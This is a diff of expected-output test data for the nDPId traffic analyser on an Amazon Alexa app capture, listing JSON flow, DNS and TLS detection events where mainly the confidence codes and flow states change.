-00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1490976177026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976177026,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWmFAAEARM1GsECrYrBAqARDYADUALXE1hGEBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1490976177105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976177105,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR5+JAAEARpb+sECoBrBAq2AA1ENgAPRuAhGGBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAACEABDbvHLI="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976177105,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
{"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976177105,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k45AAEAGfKSsECrYNu8cssZsAbvv1RDwAAAAAKAC\/\/\/QEwAAAgQFtAQCCAoA9oN+AAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -808,80 +808,80 @@ 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2617,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWDhAAOcGEQY27xyyrBAq2AG7xm3jvKzYm8EnVHASH\/4drgAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2619,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok49AAEAGfLesECrYNu8cssZsAbvv1RDxxhHYKlAQAVccyQAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopC1AAEAGbBmsECrYNu8cssZtAbubwSdU47ys2VAQAVdoHwAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177276,"flow_last_seen":1490976177276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177276,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1490976177276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177276,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZidAAEAGqgusECrYNu8cssZvAbuB1uWoAAAAAKAC\/\/9pRgAAAgQFtAQCCAoA9oOPAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1490976177409,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177409,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnrRAAOcGyok27xyyrBAq2AG7xm8x5Gl6gdblqXASH\/5ueAAAAgQFtAEDAwY="} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
